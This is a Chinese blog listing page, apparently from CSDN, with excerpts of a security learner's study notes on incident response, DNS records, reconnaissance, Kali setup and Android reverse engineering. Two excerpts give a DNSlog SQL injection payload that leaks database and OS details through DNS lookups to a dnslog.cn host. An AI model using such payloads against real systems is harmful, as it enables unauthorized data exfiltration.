- 博客(17)
- 资源 (5)
- 收藏
- 关注
原创 关闭Java(TM) Platform SE binary
Java(TM) Platform SE binary 这个进程占内存和CPU太大了,最近没用java,不知为什么这个进程一直开启关不掉,疯狂消耗资源。用下面脚本可关掉,不过系缚 次开机都要运行一下。taskkill /F /IM javaw.exetaskkill /F /IM monitorw.exe有永久关闭其服务的方法吗?...
2021-12-05 17:17:37
8126
原创 2021-07-13
标题: Microsoft SQL Server 2008 R2 安装程序------------------------------出现以下错误:Could not open key: UNKNOWN\Components\7ABFE44842C12B390AF18C3B9B1A1EE8\000021599B0090400100000000F01FEC. Verify that you have sufficient access to that key, or contact your s..
2021-07-13 19:10:00
214
原创 pcap包文件查看
可以用wireshark打开比较多时可以用 strings data.pcap | grep -i "flag"或拿到base64密文可以用工具也可以直接用命令解密echo “dklasdfjlasdlfak==” | base64 -d即可解密%3D 为=
2020-12-30 14:55:50
2926
原创 应及响应
windows 应急工具linux应急工具应急流程1、了解情况 与业务人员交流查看侦测报告和网络日志查网络拓扑和访问控制列表排除某些攻击途径了解影响业务 包括潜在业务2、调查阶段收集数据主机信息:日志、记录、文档等。网络证据司法鉴定。。。。计算机取证.......3、报告立即记录简明并描述清楚用模板提供解决方案4、具体操作windows查后门 用户及用户文件 系统日志分析 信息收集与提交按启动方式查找按行...
2020-12-29 16:49:00
260
1
原创 计算机安全事件
定义 由于自然或者人为,以及软硬件本身缺陷或故障的原因,对信息系统造成危害,或者在信息系统内发生对社会造成负面影响的事件。常见的一些安全事件有:1、不当使用2、商业关系侵权3、拒绝服务攻击4、商业机密被窃取5、垃圾邮件6、对计算机系统的非法入侵或者未授权访问7、盗用8、非法发布,非法发布内容9、被勒索通常我们接的工作是拒绝服务 恶意代码 非受权访问 违反使用政策 多种复合型安全事件...
2020-12-29 15:46:14
1847
原创 如何做爬虫
一、爬虫步骤1、需求分析 ---从哪里找网站2、寻找需要的URL ---3、通过url获取返回信息4、定位信息 --5、存储信息二、
2020-12-28 19:38:28
1019
1
原创 常用命令
nslookup 域名 baidu.comping www.baidu.comdig baidu.com 仅是A记录dig @8.8.8.8 baidu.comdig @8.8.8.8 baidu.com any --查所有反向查用 xdig -x 114.114.114.114ping ip -c 1 一个包查DNS服务器bind版本信息,利用对应漏洞dig txt chaos VERSION.BIND @dns.baidu.com.whois baidu.c...
2020-12-26 23:24:57
110
原创 域名记录
1、A记录地址正向解析将一个主机和一个IP关联2、PTR为反向解析IP对主机3、Cname别名记录多个主机域名对应一个IP1个IP可以帮定N个域名4、NS 名称服务器,授权服务器用来指定解析域名的域名服务器5、MX mail exchange邮件交换记录,指向邮件服务器...
2020-12-26 22:53:40
170
原创 被动信息收集
利用第三方服务收集用百度、Google要收集的内容1、IP2、域名2、邮件地址4、公司地址5、组织架构6、联系电话8、人员,职务9、网站架构、系统架构10、商业模式、11、供应商、12、客户13、行业新闻14、市场情况等用途1、构划目标2、社工...
2020-12-26 22:44:22
152
1
原创 kali
复制 Ctrl+insert粘贴 shift+insertvim /etc/apt/sources.list改为国内源apt update 获取最新的软件包列表kali 版本kali.org 资料下载 发布信息Rolling版,是即时更新版三类不同软件包main 遵从自由软件指导方针(DFSG),不依赖于non-freecontrib 遵从自由软件指导方针(DFSG),依赖于non-freenon-free 不遵从自由软件指导方针(DFSG)DFSG为De..
2020-12-26 22:34:53
104
原创 EXP和POC
EXP Exploit 漏洞利用代码,运行之后对目标进行攻击。POC Proof of Concept 漏洞验证代码,检测目标是否存在对应漏洞。
2020-12-26 20:21:23
2315
原创 查操作系统
http://ip:8022/dns/?id=1%20and%20load_file(concat(%27//%27,(select%20@@global.version_compile_os),%27.o0ljyn.dnslog.cn/t.txt%27))
2020-12-24 23:02:32
156
原创 DNS log注入
有注入漏洞时盲注:substr(database(),1,1)='a'DNS解析dnslog.cn读取本地文件load_file("c:/windows/1.txt"远程读取文件unc路径 //load_file('//',(select database()),'.6u0bvl.dnslog.cn/t.txt'))可以看到数据库名...
2020-12-24 22:41:37
160
原创 逆向安卓基础
APK文件结构1、assets 配置文件 第三方调用2、lib 一般存放so文件3、META-INF 签名文件4、res 放UI,图标5、androidmainfest 二进制 全局清单 包名 起动项 权限6、classes.dex java代码7、resources.arsc 放ID 字符串 为布局提供调用反编译用到的工具1:apktool 输出一些文件2、androidkiller 基于apktool的可视化,方便修改。 不为改so 和配置文件 不支持二进制这..
2020-12-22 19:13:31
153
MINITAB基础PPT
2017-09-14
代码管理ANKHSVN插件的用法
2008-10-23
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人